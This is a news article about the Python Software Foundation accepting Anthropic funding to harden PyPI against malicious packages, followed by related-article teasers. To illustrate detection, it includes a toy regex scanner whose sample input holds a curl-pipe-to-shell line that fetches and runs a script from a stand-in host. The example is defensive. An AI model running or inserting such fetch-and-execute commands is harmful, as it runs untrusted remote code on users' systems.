Python foundation accepts Anthropic funding after rejecting US grant

The Python Software Foundation has secured $1.5 million from Anthropic, the company behind Claude AI, for a two-year partnership focused on enhancing Python ecosystem security. This follows the foundation's rejection of similar funding from the US government last year over concerns about diversity, equity, and inclusion policies. The investment aims to protect the Python Package Index from supply chain attacks and support ongoing operations.

Python has become essential to modern AI development, powering frameworks like TensorFlow and PyTorch due to its accessibility and rich libraries. On January 15, 2026, the Python Software Foundation (PSF) announced a $1.5 million investment from Anthropic over the next two years.

Last year, the PSF rejected a comparable $1.5 million grant from the National Science Foundation (NSF). The decision stemmed from a clause allowing the NSF to reclaim funds if the PSF violated the US government's anti-DEI policies. Loren Crary of the PSF addressed this in a statement, highlighting the foundation's concerns.

Anthropic's funding targets security improvements for the Python ecosystem, particularly the Python Package Index (PyPI). PyPI hosts hundreds of thousands of packages and serves millions of developers worldwide but remains vulnerable to malicious open-source uploads. The partnership will develop automated review tools for uploaded packages, shifting from reactive measures to proactive detection.

Key initiatives include creating a dataset of known malware to train detection tools that spot suspicious patterns. This approach could extend to other open-source repositories. Beyond security, the funds will sustain PyPI operations, the Developers in Residence program for CPython contributions, and community grants.
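The PSF has not published details of the planned detection tooling, but the general idea of pattern-based malware screening can be illustrated with a toy scanner. The rule names and regular expressions below are purely hypothetical examples loosely inspired by publicly reported PyPI malware tactics (obfuscated `exec` calls, install-time downloads, shell commands); they are not PyPI's actual checks.

```python
import re

# Hypothetical heuristic rules for flagging suspicious package source.
# These are illustrative only, not PyPI's real detection logic.
SUSPICIOUS_PATTERNS = {
    "obfuscated-exec": re.compile(r"exec\s*\(\s*base64"),
    "install-time-download": re.compile(r"urllib\.request\.urlopen|requests\.get"),
    "shell-command": re.compile(r"os\.system|subprocess\.(run|Popen|call)"),
}

def scan_source(source: str) -> list[str]:
    """Return the names of heuristic rules that match the given source code."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items()
            if pattern.search(source)]

sample = (
    "import base64, os\n"
    "exec(base64.b64decode(payload))\n"
    "os.system('curl example.com/x.sh | sh')\n"
)
print(scan_source(sample))  # ['obfuscated-exec', 'shell-command']
```

In practice, a dataset of known malware would let such rules be learned or validated statistically rather than hand-written, which is the shift from reactive to proactive detection the partnership describes.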

Anthropic's contribution underscores its reliance on Python for operations, blending self-interest with community support. As AI firms increasingly depend on open-source infrastructure, such investments highlight the need for sustainable funding models amid corporate freeloading concerns.

Related articles


Linux Foundation launches Agentic AI Foundation



The Linux Foundation announced the creation of the Agentic AI Foundation (AAIF) on December 9, 2025, in San Francisco, to foster open-source development of AI agents. Co-founded by Anthropic, Block, and OpenAI, the initiative includes donations of key projects: Anthropic's Model Context Protocol (MCP), Block's goose framework, and OpenAI's AGENTS.md. The foundation aims to promote interoperability and prevent fragmentation in AI agent technologies.


Anthropic's official Git MCP server contained worrying security vulnerabilities that could be chained together for severe impacts. The issues were highlighted in a recent TechRadar report. Details emerged on potential risks to the AI company's infrastructure.

Anthropic has introduced Cowork, a new tool that extends its Claude AI to handle general office tasks by accessing user folders on Mac computers. Designed for non-developers, it allows plain-language instructions to organize files, create reports, and more. The feature is available as a research preview for Claude Max subscribers.


DP Technology, a Beijing-based AI-for-science company, has raised more than 800 million yuan ($114 million) in a Series C round to expand research and development and recruit talent. The round was backed by state-linked and venture investors, and comes amid growing interest in using AI to accelerate scientific discovery.

AI coding agents from companies like OpenAI, Anthropic, and Google enable extended work on software projects, including writing apps and fixing bugs under human oversight. These tools rely on large language models but face challenges like limited context processing and high computational costs. Understanding their mechanics helps developers decide when to deploy them effectively.


AerynOS, an alpha-stage Linux distribution, has implemented a policy banning large language models in its development and community activities. The move addresses ethical issues with training data, environmental impacts, and quality risks. Exceptions are limited to translation and accessibility needs.

